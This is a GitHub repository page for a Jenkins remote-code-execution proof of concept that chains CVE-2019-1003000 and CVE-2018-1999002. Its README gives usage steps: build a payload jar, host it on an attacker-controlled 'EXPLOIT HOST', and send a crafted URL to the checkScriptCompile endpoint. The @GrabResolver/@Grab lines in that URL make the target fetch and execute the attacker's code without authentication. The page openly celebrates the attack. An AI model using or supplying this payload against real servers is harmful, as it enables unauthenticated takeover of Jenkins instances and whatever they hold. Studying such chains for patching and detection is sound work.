Skip to content
😈 Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)
Branch: master
Clone or download
Latest commit 83555c0 Feb 21, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
code Initial commit Feb 19, 2019
www/package/payload/1 Initial commit Feb 19, 2019
README.txt fixed EXPLOIT HOST Feb 21, 2019 Initial commit Feb 19, 2019



Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (

Read his write-ups on this exploit here -
Part 1:
Part 2:
His github:

- Edit code/ to your specifications, then run to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files.

URL Payload:
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.